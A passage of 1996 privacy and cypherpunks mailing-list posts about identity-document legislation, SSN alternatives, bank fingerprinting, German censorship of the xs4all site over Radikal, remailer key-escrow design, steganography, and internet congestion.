if they live in border areas. Increasing discrimination against our own citizens is no way to deal with the problem of illegal immigration. ...TANGLE CITIZENS IN GOVERNMENT RED TAPE. The federal bill requires any citizen that needs to use their birth certificate for official identification to get a reissued birth certificate from their place of birth by October 1999. Senior citizens that intend to apply for Medicare will need to obtain a new birth certificate. Couples engaged to be married will need new birth certificates for a marriage license and to change their names. Professionals traveling internationally for business or families going on vacation overseas will need new birth certificates to obtain passports. With millions of citizens requesting new birth certificates, lines and waits for federally-approved birth certificates will be long. All recipients will be charged a fee for their new birth certificates. ------------------------------- UPDATE: To study the full text of the Senate's version of H.R. 2202, go to http://thomas.loc.gov and look up S.1664, section 118. Write or call conferees and your own member of the House. As of Thursday, 8/29/96, 4:30 pm EDT, Senate conferees on the immigration bill were: Feinstein, Dianne - California Grassley, Chuck - Iowa Hatch, Orrin - Utah Kennedy, Edward - Massachusetts Kohl, Herb - Wisconsin Kyl, Jon - Arizona Leahy, Patrick - Vermont Simon, Paul - Illinois Simpson, Alan - Wyoming Specter, Arlen - Pennsylvania Thurmond, Strom - South Carolina Likely House conferees include: Becerra, Xavier - California (30) Berman, Howard - California (26) Bono, Sonny - California (44) Bryant, Ed - Tennessee (7) Bryant, John - Texas (5) Conyers, John, Jr. - Michigan (14) Frank, Barney - Massachusetts (4) Gallegly, Elton - California (23) Goodlatte, Bob - Virginia (6) Hyde, Henry - Illinois (6) McCollum, Bill - Florida (8) Smith, Lamar - Texas (21) Please do not wait to contact House conferees. The conference report could be issued within as little as 24 hours of their final selection. To be most effective, letters should be postmarked by Saturday, August 31st, or faxed early the following week. Members' offices also may be reached by phone through the Capitol Switchboard (202) 224-3121. Thanks for your help. ------------------------------ Date: Fri, 16 Aug 96 15:24 EST From: Robert Ellis Smith <0005101719 at mcimail.com> Subject: Alternatives to Social Security Numbers [ From Risks-Forum Digest; Volume 18 : Issue 35 -- MODERATOR ] Last spring, I asked readers of RISKS for suggestions on alternatives to Social Security numbers in organizations with large data bases of information about individuals. Many such organizations find they do not need to use SSNs, and avoid privacy problems associated with using them. For a copy of all of the responses, send a request to us and specify whether you want hard copy or electronic edition of our August issue, and provide postal address or e-mail address. Robert Ellis Smith, Publisher, Privacy Journal newsletter, Providence, RI, 401/274-7861, e-mail 5101719 at mcimail.com. Excerpts from the suggestions follow: * FROM WASHINGTON, D.C.: Maryland uses Soundex (of name and birth date concatenated [linked in a chain]) both for driver and vehicle registrations. * FROM CAMBRIDGE, MASS.: "Against Universal Health-Care Identifiers" in the JOURNAL OF THE AMERICAN MEDICAL INFORMATICS ASSOCIATION 1:316-319, 1994, by Dr. Peter Szolovits of MIT and Dr. Isaac Kohane of Children's Hospital in Boston, discusses a number of ways in which cryptography- based health care identifiers can be used to preserve privacy while remaining manageable for typical medical purposes. This is publication #49 (in Postscript format) at http://medg.lcs.mit.edu/people/psz/publications.html. * FROM YARDLEY, PA.: One way is to use a simple scheme like three letters from last name, the first initial, and some digits; another is just to use sequential numbers. Another is an MD5 hash of the full-name string [a one-way mathematical function as a stand-in for the name that makes translation back to the original name impossible]. This is always unique for a unique string, so you might need to add some numbers. * FROM MADISON, WISC.: When I was working on the development of the Wisconsin Student Data Handbook - we tried to develop what we called an "SSN surrogate," also of nine bytes per individual. It involved an algorithm which combined year, month, and date of birth with sex and two consonants each extracted from the first and middle names. * FROM CYBERSPACE: I worked with a banking software company that set up employee records simply by exact hire date and time. Since they never hired anyone at exactly the same time, it gave each person a unique number. You could do the same for any data base in which records are added gradually one at a time - just number them based on exact date and time added. * FROM PALO ALTO, CAL.: At Stanford University we made a decision long ago not to use SSN for identification except where required by law (payroll taxes, for example). We use a unique Stanford University ID (SUID), which is a lifetime number and applies to all students, alumni, faculty, staff, and patients. It serves all the same purposes that the SSN would do if it were used. ------------------------------ Date: Sat, 24 Aug 1996 00:25:15 -0400 From: Monty Solomon Subject: SSN and Welfare Legislation Excerpt from EPIC Alert 3.15 ======================================================================= [3] Welfare Legislation Signed by Clinton ======================================================================= On August 22, President Clinton signed the Personal Responsibility and Work Opportunity Reconciliation Act of 1996. The bill includes a number of sections that expand the use of the Social Security Number and create new databases of personal information. The bill requires that states obtain individuals' Social Security Numbers for many state documents. It provides that on "any application for a professional license, commercial driver's license, occupational license, or marriage license [the SSN] be recorded on the application." The new bill also creates a national database of every employee in the United States. States are also required to create databases of "new hires." The state databases would be uploaded to a federal registry and the Social Security Administration would verify the SSNs. The Commissioner of Social Security is required to develop "a prototype of a counterfeit-resistant social security card" made of tamper proof materials for proving citizenship, and to issue a report on the cost of issuing a new card to all citizens over a three, five or ten year period. More information on the welfare bill, the Social Security Number, and efforts to expand its use is available at: http://www.epic.org/privacy/ssn/ ------------------------------ Date: Fri, 30 Aug 1996 10:34:03 -0700 (PDT) From: jd at scn.org (Janeane Dubuar) Subject: fingerprinting by banks SEATTLE WEEKLY Copyright 1996 - used with permission July 24,1996 - "Quick and Dirty" column by Eric Scigliano Thumbprint, retinal or body-odor scan, sir? If you think those "Go to Jail" charity slumber parties are a scream, you may get a kick out of cashing checks after September 11. That's when US Bank will start requiring that non-customers cashing its checks consent to be finger--or, rather, thumb--printed. Other local banks are expected to join US Bank on the new security frontier in September, and at least one, Seafirst, plans to start taking thumbprints next year in step with its California parent, Bank America. The thumbprinting scheme is being pushed by the Washington Bankers Association, which wants all its members to take the plunge together. As Dan Doyle, regional manager over US Bank's Western Washington branches, notes, "I'm not sure any one bank wants to be the one to step out and do it--it probably sounds cold, hard, and not very customer-friendly." Indeed. "But it's really to protect customers." That protection is supposed to come from deterrence. Very few, if any, check forgers actually get caught via thumbprints in those states (most notably Texas, Nevada, and Arizona) whose banks already take them. Tellers can't (yet, anyway) check the prints for known forgers; the prints will merely be saved (on the checks themselves) for investigation in the event of a bounce. But Bruce Koppe, the Bankers Association's executive director, reports that bogus-check losses have declined by 40 percent in those states. Doyle says US Bank has charted 45 percent reductions in states where it's tried the system, and fewer than 1 percent of those asked decline to give prints. Some retailers, and reportedly at least one local credit union, are already taking prints on checks. Customers can at least be reassured that they won't have to bear the telltale black stains of traditional fingerprinting; the new "inkless" printing leaves no visible mark on the skin. Still, fingerprinting is, in the words of American Civil Liberties Union lobbyist Jerry Sheehan, "the archetypal metaphor of criminality, along with the mug shot and lineup." Some tellers are already grumbling at the prospect of having to do it. The banks take heart that they won't be demanding prints of their current customers. But the ill will may still come around to bite them; those are all potential customers they stand to infuriate, and account-holders may not like the idea of their checks being valid only when backed by thumbprints. And thumbprinting may be just the nose under the tent. That mixed bodily metaphor suits the brave new world of "biometric" identification in which we will, very soon, find ourselves. Down in Olympia, a working group of the joint Legislative Transportation Committee is considering what kind of biometric and/or computer technology to adopt in upcoming "smart" driver's licenses; its findings are due in December, preparatory to the next legislative session. Possibilities include a bar code or magnetic strip; a store scrutinizing your check or a cop writing a ticket could scan your full digitalized profile. All the drivers' license data that now fills a state warehouse could be consolidated in a single data base. And all those sci-fi and privacy-protectionist warnings about personal bar codes and instant snooping will come true. Transportation Committee staffer Jennifer Joly says that fingerprinting is still the most common form of biometric ID. But more exotic techniques are coming in: hand geometry scans, retinal scans, iris scans, computerized facial recognition, and (I am not making this up) body odor measurement. It seems unlikely that those who take IDs will stop at thumbprinting checks. Joly reports that bankers, retailers, and law-enforcement groups have joined in a coalition to weigh in on the new drivers' licenses. "We'll be pushing for legislation imposing severe restrictions" on fingerprinting, the ACLU's Sheehan vows. And they'll "continue to resist these pressures to create uniform identification papers from a document intended for driver's certification." [...] July 31, 1996 - "Quick and Dirty" column by Eric Scigliano [...] They want to know it all If you feel queasy about being fingerprinted by a bank, imagine how tellers feel about all the information they're supposed to disclose. US Bank asks employees to fill out an "extortion readiness card" listing all their cars (by number and "markings") and neighbors, the names, schools, and daily routes and schedules of their children, and any meetings they themselves regularly attend. US Bancorp spokeswoman Mary Ruble says taking such data is a longtime standard banking practice done for the employees' "own safety," to protect them in "hostage situations" and to help authorities "follow up if a claim of kidnapping is made." She adds that US Bank has never encountered such a situation, but believes other banks have. The cards are kept confidential in a central office, and filling them out is "voluntary for employees." But one bank worker who objected recalls being told to fill out the card anyway, and got the feeling, despite the explanation, that the intent was really to guard against crimes by, rather than against, employees. "The extortion readiness card has nothing to do with embezzlement," says Ruble. ----------------------------------------------------------------------------- The Internet PRIVACY Forum is a moderated digest for the discussion and analysis of issues relating to the general topic of privacy (both personal and collective) in the "information age" of the 1990's and beyond. The moderator will choose submissions for inclusion based on their relevance and content. Submissions will not be routinely acknowledged. All submissions should be addressed to "privacy at vortex.com" and must have RELEVANT "Subject:" lines; submissions without appropriate and relevant "Subject:" lines may be ignored. Excessive "signatures" on submissions are subject to editing. Subscriptions are by an automatic "listserv" system; for subscription information, please send a message consisting of the word "help" (quotes not included) in the BODY of a message to: "privacy-request at vortex.com". Mailing list problems should be reported to "list-maint at vortex.com". All messages included in this digest represent the views of their individual authors and all messages submitted must be appropriate to be distributable without limitations. The PRIVACY Forum archive, including all issues of the digest and all related materials, is available via anonymous FTP from site "ftp.vortex.com", in the "/privacy" directory. Use the FTP login "ftp" or "anonymous", and enter your e-mail address as the password. The typical "README" and "INDEX" files are available to guide you through the files available for FTP access. PRIVACY Forum materials may also be obtained automatically via e-mail through the listserv system. Please follow the instructions above for getting the listserv "help" information, which includes details regarding the "index" and "get" listserv commands, which are used to access the PRIVACY Forum archive. All PRIVACY Forum materials are available through the Internet Gopher system via a gopher server on site "gopher.vortex.com". Access to PRIVACY Forum materials is also available through the Internet World Wide Web (WWW) via the Vortex Technology WWW server at the URL: "http://www.vortex.com"; full keyword searching of all PRIVACY Forum files is available via WWW access. ------------------------------ End of PRIVACY Forum Digest 05.16 ************************ Date: 2 Sep 1996 13:52:18 -0500 From: "Dave Banisar" To: "Interested People" Subject: National ID Card Web Pages EXTENSIVE NATIONAL ID CARD WEB SITE IS NOW ON LINE The London-based human rights watchdog Privacy International (PI) has just opened an extensive web page on National ID cards. The initiative comes in the wake of pending efforts in the United States, Canada and United Kingdom to implement national ID card systems. The page contains a 7,000 word FAQ (Frequently Asked Questions) on all aspects of ID cards and their implications. Also included in the PI documents is a paper describing successful campaigns opposing to ID cards in Australia and other countries. The page also has links to numerous other sites and documents. PI Director Simon Davies said he hoped the page would help promote debate about the cards, "ID cards are often introduced without serious discussion or consultation. The implications are profound, and countries planning to introduce them should proceed with caution." "The existence of a card challenges important precepts of individual rights and privacy. At a symbolic and a functional level, ID cards are often an unnecessary and potentially dangerous white elephant. They are promoted by way of fear-mongering and false patriotism, and are implemented with scant regard for serious investigation of the consequences." he said. The URL is : http://www.privacy.org/pi/activities/idcard/ PI has also set up an auto response function for the FAQ document. Its address is: idcardfaq at mail.privacy.org Privacy International is an international human rights group concerned with privacy and surveillance issues. It is based in London, UK. For further information contact the Privacy International Washington Office at +1.202.544.9240 or email pi at privacy.org. PI's web page is available at: http://www.privacy.org/pi/ _________________________________________________________________________ Subject: National ID Card Web Pages _________________________________________________________________________ David Banisar (Banisar at privacy.org) * 202-544-9240 (tel) Privacy International Washington Office * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.privacy.org/pi/ Washington, DC 20003 From tank at xs4all.nl Fri Sep 6 19:17:39 1996 From: tank at xs4all.nl (tank) Date: Sat, 7 Sep 1996 10:17:39 +0800 Subject: German Government censors dutch site www.xs4all.nl Message-ID: <199609062255.AAA09827@xs2.xs4all.nl> Forwarded: a letter by Felipe Rodriquez, Managing Director XS4ALL Hello, This is an email I just wrote to Michael Schneider, the guy that adviced German Internetproviders to censor www.xs4all.nl and www.serve.com. He will probably forward the text to the German Public Prosecutor General, who should also read it. I try to make them understand that censoring is not very effective on the Net, and that they should stop it right now. At the same time I threathen to sue both of them for free-speech infringement and damages. We'll see what happens. Censoring the Net is _the way_ to make bestsellers, when will the governments understand ? ------------------------------------------------------------------- Hello Michael, > http://www.anwalt.de/ictf/p960901e.htm > > It now contains a digest of the complete occasion including parts of the > letters I wrote to the Public Prosecutor General. I read it yesterday. Thanks. > I would appreciate, if you portray the activities of ICTF entirely and > exactly. I consistently state that the German providers where forced to censor by the Public Prosecutor. This is also what people understand from the press-releases we sent. Evenso the entire www.xs4all.nl website is blocked, with 3100 pages, in order to censor 1 single homepage. Regardless who is responsible for the censor-actions, it is an outrage that 3100 xs4all customers are censored by Germany. Without a single phonecall, fax, email or letter to Xs4all internet or the user that placed the Radikal pages on our website. If there are pages that are not accepted by Germany, then Germany can always confront us, or the website owner, in a Dutch court of law. It may interest you to know about some developments: There are a number of mirrors for the Radikal site. All sorts of people have spontaneously started to copy the websites to their own system: http://burn.ucsd.edu/%7Eats/RADIKAL/ http://www.jca.or.jp/~taratta/mirror/radikal/ http://www.serve.com/~spg/ http://huizen.dds.nl/~radikal http://www.canucksoup.net/radikal/index.html http://www.ecn.org/radikal http://www.well.com/~declan/mirrors/ http://www.connix.com/~harry/radikal/index.htm http://www.ganesa.com/radikal/ http://www.denhaag.org/~radikal There are more mirrors than just these, but i did not get the entire list. According to the German General Prosecutors opinion these sites would also need to be blocked. Expect the list of mirrors to grow, and expect to be forced to block that growing list of sites on the Net. Realize that a lot of internetusers consider it a sport to redistribute censored information. The way to write a bestseller on the Net is to have it censored by some government. It has the opposite effect. The entire issue 154 of Radikal has been posted in German newsgroup by anonymous users. German users can still use remote (non-german) proxy-servers to access all the Radikal information on Internet. People have posted information about these remote proxyservers in German newsgroups. Xs4all uses rotating IP-numbers for its services. The IP-numbers of certain sites and services are changed every couple of hours. A static ip-filter would certainly not be enough to block www.xs4all.nl. We have asked our parliament and department of Foreign Affairs to help us fight this blunt German censorship. We have also asked the EFF, CPSR and EPIC for advice, and to spread our press-release. A fax was also sent to CNN, Wired, and other press-services. We have discussed starting legal procedures against Germany and the ICTF with our lawyer. If any political and diplomatic actions fail to stop this act of blunt censorship, then we will most probably start litigation against the German government and the ICTF, for damages and violation of the European right on free-speech. It is clear that censoring 3100 pages, to prevent one of them from being published, is an infringement of European free-speech legislation. We have adviced the provider behind www.serve.com, that is also censored, to engage in the same kind of procedures. Please inform the German Public Prosecutor General that the censoring actions have been ineffective, and that Radikal is now on many different websites and is being distributed widely on the entire Internet. Continuing to block this growing list of sites would be an impossible task, what happens if Germany demands to block AOL, EFF, Compuserve, Prodigy, The Well, Netcom and Demon Internet next week ? Providers would be forced to block large part of Internet. I don't think that's what anyone would like to happen. Kind regards, Felipe Rodriquez -- Felipe Rodriquez - XS4ALL Internet - finger felipe at xs4all.nl for http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 From mab at research.att.com Fri Sep 6 19:24:49 1996 From: mab at research.att.com (Matt Blaze) Date: Sat, 7 Sep 1996 10:24:49 +0800 Subject: Job for netescrow ? (was Secure anonymouse server protocol... In-Reply-To: <199609061322.OAA01150@server.test.net> Message-ID: <199609062250.SAA13820@nsa.research.att.com> Adam Back writes: > >Peter Allan writes on cpunks: >> In the talk about replyable nym-mailers I haven't >> yet seen netescrow mentioned. >> >> You DID all read this ? >> >> [Matt Blazes Oblivious Key Escrow paper] >> >> This all hinges on a policy to be followed by archive holders defining >> the conditions under which they release their shares. >> This could be receipt of a signed request from the owner (remailer). >> >> Maybe the table relating nyms to reply addresses could be stored in >> netescrow style so that captured remailers reveal nothing. The problem >> of operator coercion is not addressed by this. > >Just to clarify, if I understand correctly you are proposing a penet >style system with the database held in `netescrow'. > >The remailer in normal operation has access to the database by making >requests satisfying the conditions of the secret share holders. > >When the remailer is compromised the memory resident key is lost when >the machine is switched off, and the owner refuses to release the key. > >Is what you are proposing? > >It sounds like a cross between Matt's netescrow and Ross Anderson's >eternity file system. Your penet database is being stored in a >distributed file system, with shares, and the identity of the share >holders is concealed. However the aim is not to prevent others >censoring your publically available writings, but to allow a second >avenue of access only in the case of `mob cryptography'. > >This changes the system over storing the database encrypted on the >remailer machines own disk in these ways: [well-thought-out stuff deleted] This is the first I've seen this proposal to use Oblivious Key Escrow (OKE) as a store for a remailer database; apologies if all this has been discussed already (I don't ready cypherpunks very often these days). My original idea for OKE was as a way to backup long-term, slow-changing sensitive data without also introducing a single point of failure for either security or availability. The remailer model is a bit different, and I'm not sure it's a good fit, in particular because I haven't thought about the various new failure modes in this application. But let me think ``out loud.'' Suppose we want to build a persistent-reply address anonymous messaging service (like the late anon.penet.fi) with the following properties: a) The database that maps anonymous addresses to real addresses is secure against erasure or other permanent loss of availability b) The database is also secure against accidental or coerced disclosure. Requirement (a) implies backups and persistent storage. Requirement (b) implies that both access to both operational and backup copies must be carefully controlled, preferably by technical means. So far, this looks like a good candidate for distributed security, in the style of OKE, Mike Reiter's Rampart service, or Ross Anderson's Eternity service. Actually, I think the best solution would be for the remailer itself to be a distributed process, split among enough places to make it difficult for anyone to attack enough nodes to compromise or recover the address translation database. It is not at all obvious how to do this in practice, however, since any solution would need to combine secure distributed computation (to calculate the mapping for each message sent without revealing to any party, including the sender, what the mapping is) with anonymous networking techniques such as mixes to prevent traffic analysis from revealing the mapping. There are a number of unsolved theoretical and practical problems here, and I think working out the details of such a system would make for a good PhD thesis or two (quite seriously, and I'd be interested in talking with anyone who wanted to pursue such a line of research). So for now let's limit ourselves to existing tools and techniques, or at least tools and techniques that are close to existing. Let's say, for the moment, that we wanted to base the system on OKE. Assume an unconditionally trusted remailer operator whose goal is to construct a system that resists attempts to force him or her to UNILATERALLY reveal the database. That is, it should not be possible to force the remailer operator to reveal the database contents without also enlisting the aid of the (collectively anonymous) oblivious key holders. My (not carefully considered) first thought is that the address database would be encrypted and stored locally, using a key that is escrowed using OKE. The key would never be locally stored; preferably, the key would exist only in memory. The operating system on which the remailer is run would delete this key ``at the drop of a hat,'' e.g., any time the system was rebooted, any time someone logs in, any time unusual activity of any sort is detected. The key release policy is controlled by a public key, for which the secret key is stored in a more persistent manner (e.g., in the file system). Whenever the database key is deleted, the OKE recovery process is used to recover the key automatically, and the database is re-encrypted with a new key that is distributed to a new set of shareholders. Under normal operation, this might happen once a month or so, and might entail (because of policy-based delays and the time required to collect shares) a few days of downtime. Under unusual conditions that might precipitate some kind of coercive situation, the remailer operator (or some automatic process on the remailer machine) would delete the signing key as well as the database. It might be reasonable, for example, to delete this file any time someone logs in to the remailer machine (which shouldn't be needed ordinarily). The OKE share policy would require that the shareholder operator examine unsigned key requests manually before releasing them. If the keys were deleted because of a false alarm or machine failure, the remailer operator would send a message saying something to the effect of ``Hey, I blew it. Please send me the key shares once you're convinced no one has a gun to my head.'' In the event of a public safety emergency, the police are free to attempt to issue their own appeal for key shares, but the ability to for them to do this is not a design goal, but rather a side-effect of the design. I see a number of problems with using OKE for this. In particular, key recovery is moderately expensive and key distribution with the oblivious multicast protocol in my paper can be very expensive. If keys are deleted regularly, the downtime could be unacceptable. I'm not sure OKE is entirely workable for this application, but perhaps a more clever design could prove me wrong. There are a whole bunch of engineering issues here, particularly related to automatically detecting ``unusual'' situations. So can this scheme be improved upon? Is there a better way to run a persistent-reply-address remailer? These are interesting, and I think largely open, questions. -matt NB The oblivious key escrow paper that I presented at the Information Hiding workshop at the Isaac Newton Institute in May, is available at: ftp://ftp.research.att.com/dist/mab/netescrow.ps From rwright at adnetsol.com Fri Sep 6 19:49:41 1996 From: rwright at adnetsol.com (Ross Wright) Date: Sat, 7 Sep 1996 10:49:41 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609062352.QAA20226@adnetsol.adnetsol.com> On Or About: 6 Sep 96 at 18:04, E. Allen Smith wrote: > list-managers list, a consent arrangement would thus be preferable. The > other argument of the Cyber Promotions jerks is nonsense - how does AOL > blocking affect the rest of the Internet? It's affecting the rights of these fine spammers, Cyber Promotions. That affects spammers everywhere. More rules by our government affects all of us. > >PHILADELPHIA, Pa. (Sep 6, 1996 12:23 p.m. EDT) -- A federal judge has = <<<>>>> > >"We feel that America Online has violated the civil rights of their = > >members and has violated our rights to send e-mail through the Internet, = > >which AOL does not own," he said. > > >Although unsolicited mail sent through the post office in the United = > >States is not considered illegal, the rules have yet to be defined in = > >cyberspace. That's the real point I have always made. No rules and we should not want rules. Why are we INVITING the government into OUR internet??? Just cause we have to read spam? That is just plain stupid!!! Just cause we have to read spam, oh well, let the government come on in. Do we let the government into our bedrooms because our wife says no to sex tonight or because we don't like to make our beds?? Everyone on this list seems to want to limit government intervention EXCEPT when it comes to spam, then every one just holds the door open wide and let them in. If they get that inch, they WILL take the whole 9 YARDS!!!!!! Get a clue, delete or killfile those who spam and keep the government out of cyberspace!!!!!! By the way, I get about 2 or 3 spams a day in my mailbox and it is not killing me! Don't get the wrong idea, I don't like it. I like the government WAY LESS!!!!! =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From jf_avon at citenet.net Fri Sep 6 20:01:27 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Sat, 7 Sep 1996 11:01:27 +0800 Subject: Race Bit: C Message-ID: <9609062346.AA24494@cti02.citenet.net> On 6 Sep 96 at 10:50, jim bell wrote: > Since red liquid running in the streets is generally so reviled, one > of the things which mystifies me is why there aren't more > simulation-type programs used to test out hypotheticals, for example > a "SimEconomy." For example, you'll occasionally hear about a > media news organization gathering a dozen or so volunteers in a > room, and asking them to solve a problem like "The Budget Deficit" > or some such. The result of their interplay is generally used to > explain why these problems are hard to solve. Why do you suppose that solving the problem they created is their goal? On a more fundamental level, why do you assume the their goal is to improve life at all? Ask yourself if this is what they truly want. jfa Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies, R&D consultant physicists, technologists and engineers PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From jf_avon at citenet.net Fri Sep 6 20:06:35 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Sat, 7 Sep 1996 11:06:35 +0800 Subject: What the NSA is patenting Message-ID: <9609062352.AA24858@cti02.citenet.net> A maybe usefull program would be a little tsr that constantly overwrite unused sectors of the entire drive with random patterns (maybe seeded with a fast keyboard interval timer). Like at the very moment I am writing this, my HD has been idle for several minutes... One more of my silly ideas JFA Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies, R&D consultant physicists, technologists and engineers PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From nobody at replay.com Fri Sep 6 20:36:52 1996 From: nobody at replay.com (Name Withheld by Request) Date: Sat, 7 Sep 1996 11:36:52 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <199609070035.CAA06972@basement.replay.com> >A Modest Proposal: > >* as Germany is bent on blocking sites which carry this subversive >pamphlet, "Radikal," let us mirror it on thousands of sites around the >world. > >* when the Germans went into Danmark and insisted Jews wear badges, >ordinary citizens (and the Danish Royal Family, as I recall) also took to >wearing these Star of David badges. Add this plug to signatures and web pages: ----------------------------------------------------------------------- Lebt und lest radikal! http://www.xs4all.nl/~tank/radikal/ ----------------------------------------------------------------------- Then, your messages are "promoting a terrorist organization" (cf. http://www.anwalt.de/ictf/p960901e.htm) and may no longer be carried in Germany. [It just says to live radically, and to read "radikal". But "radikal" is a terrorist magazine after all.] From jya at pipeline.com Fri Sep 6 20:37:47 1996 From: jya at pipeline.com (John Young) Date: Sat, 7 Sep 1996 11:37:47 +0800 Subject: GAM_lin Message-ID: <199609070046.AAA03599@pipe1.t2.usa.pipeline.com> 8-8-96. Wash Tech: "Internet Betting Spurs Regulatory Interest." A new commission to investigate the nation's $40 billion gambling industry will initiate Congress' latest effort to curb the fast-growing gambling industry, and may open up additional efforts to regulate the burgeoning Internet industry. Extra legislation is not needed to suppress on-line gambling, said Bernie Horn, National Coalition Against Legalized Gambling. "If the Justice Department wanted to, it could make things unbearable for companies offering on-line gambling from outside the country," he said. ----- http://jya.com/gamlin.txt (5 kb) GAM_lin Thanks to BC. From dfloyd at io.com Fri Sep 6 21:03:01 1996 From: dfloyd at io.com (Douglas R. Floyd) Date: Sat, 7 Sep 1996 12:03:01 +0800 Subject: Steganography -- Tell-tale signs? In-Reply-To: <199609051651.JAA06856@sirius.infonex.com> Message-ID: <199609070003.TAA11985@pentagon.io.com> > > Hi there! > > I'd appreciate some help from you experts in > steganography. > > 1) If I hide some PGP encrypted data in a > gif, jpg or wav file will there be any tell tale > signs to the naked eye of an expert? If yes, > what are they? If you stego too many bits in a figure, it may become apparent. > > 2) Would it better to hide the data in > a jpg with black and white image rather > than a color one? > 24 bit color has more data, therefore its easier to hide random data. > 3) Are there any tools at the moment > to expose (not crack) the hidden encrypted > data? If none. are there tools in development? Not really. If you make sure there are no predictable headers, and use a good encryption algorithm, it is almost impossible to tell the presence of a hidden file unless you compare a file untouched with the one with data in it. > > If this appears twice please accept my apologies. > I didn't see the first posting and so I assumed it > was lost in transit. Please email replies to me > directly if this is off-topic. Thank you. > > Makofi > From jimbell at pacifier.com Fri Sep 6 21:08:32 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 12:08:32 +0800 Subject: Cellular phone tracing Message-ID: <199609070057.RAA25948@mail.pacifier.com> At 05:49 PM 9/6/96 EDT, E. Allen Smith wrote: > From comp.risks: > >Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT) >From: glassman at sunsite.unc.edu >Subject: FedEx monitoring of cellular phonecall locations > >[...] nowhere near either of those places, so I did not bother to mention my >current location to the operator. The next day, Saturday, I called FedEx >with the same cell phone from Blowing Rock to arrange the pickup. The >operator immediately asked if I wanted them to come to the intersection that >I had placed my call from the day before. > >Two days later, a FedEx operator confirmed that they are getting "new >systems" at some locations that are able to record the locations from which >cellular calls are placed. > >I have now asked Cellular One three times to explain to me why they do not >tell subscribers that they pass this location information through the >system, but to no avail. [...] > >========== end fwd. You should DEFINITELY start worrying when the FexX operator says something like, "I see you're the guy in the red shirt and brown pants." Jim Bell jimbell at pacifier.com From janzen at idacom.hp.com Fri Sep 6 21:16:38 1996 From: janzen at idacom.hp.com (Martin Janzen) Date: Sat, 7 Sep 1996 12:16:38 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones Message-ID: <9609070109.AA29863@sabel.idacom.hp.com> tcmay at got.net (Timothy C. May) writes: >I am about to start worrying about "junk phone calls" more so than I have >been. I just bit the bullet and bought a digital cellular phone, with a >nifty rate plan called Digital Flex: I get unlimited free airtime from 7 >p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south >of Salinas to north of Santa Rosa and as far east as the Central Valley. In >other words, the entire Bay Area and outlying communities. I can send and >receive calls over this entire region, from anywhere in the region (of >course), without any charges. > >The downside is that calls _from_ or _to_ my phone during "business" hours >are charged 42 cents a minute, airtime (tying up a channel and all), plus >whatever other fees may be applicable at each end. Thus, every "junk call" >I get trying to get me to buy aluminum siding, or to vote Democratic, or to >switch my long-distance carrier (!), costs me a minimum of 42 cents, >depending on how fast I can realize who they are and get rid of them I have a similar plan. My cell phone company includes call forwarding in the package, so I deal with the possibility of junk calls by forwarding calls from my cell phone to my regular number (which has voicemail) during the day, then turning off the cell phone. This way, the calls are intercepted right at the switch (I assume), so no airtime is used, and no charges are incurred. Works for me... -- Martin Janzen janzen at idacom.hp.com From alano at teleport.com Fri Sep 6 21:58:08 1996 From: alano at teleport.com (Alan Olsen) Date: Sat, 7 Sep 1996 12:58:08 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: <3.0b15.32.19960906182157.0101cd6c@mail.teleport.com> At 10:27 AM 9/5/96 -0700, Timothy C. May wrote: >Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how >publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a >few minutes ago. He repeated his prediction of an "Internet collapse" in >1996, based on overuse, on bad pricing models, on lack of controls, and on >other concerns. Some are griping just to gripe. Metcalfe may have a valid prediction here. I have a machine that I use for work that is connected to the net via ethernet. No 28.8k bottlenecks involved. Most of the time I am lucky if I can exceed 14K bps to anything outside the local area. When I run traceroutes, the blockage is in MCI or Sprintnet land. (Except for the one to ftp.funet.fi early this week where where two of the machines somewhere in California were caught in some sort of weird DNS loop.) The bandwidth to the net has been oversold. If the government were *Really* concerned about "protecting the net", they would be on MCI and Sprint's cases, not looking for virtual terrorists. (Virtual Terrorists are to Terrorists the same way that Virtual Reality is to actual reality.) There have been days where you could not move anything at any reasonable speed from certain areas of the country. Yes, people have been predicting the end of the net (GIF/JPEG/WAV at 11!) since it was founded. In this case, I think that the person has enough network experience to be right. With the way things are now with oversold bandwidth, the DNS numbers getting close to being used up, many of the routers needing to be replaced and/or upgraded, and software that uses bandwidth like candy (phone conversations, video conferencing, huge interactive web page animations (like shockwave), real audio, and more as the marketing droids can sell you on it.), the chances of a west coast power-system style collapse does not seem that far from reality. (There are many who I know in the industry that are amazed that it has lasted this long.) On a smaller scale, those collapses happen in a small regional area, get fixed and things go on. But just like the earthquakes in California, everyone is waiting for "the Big One". (At least this one is preventable. Lets hope that the fixes can occur before the government gets involved, otherwise the net *IS* really doomed.) --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From wb8foz at wauug.erols.com Fri Sep 6 22:30:17 1996 From: wb8foz at wauug.erols.com (David Lesher / hated by RBOC's in 5 states) Date: Sat, 7 Sep 1996 13:30:17 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960906224034.00aed230@panix.com> Message-ID: <199609070220.WAA01026@wauug.erols.com> > > So switch to Fedex. The P.O. gives lousy service anyway. Privitize. > 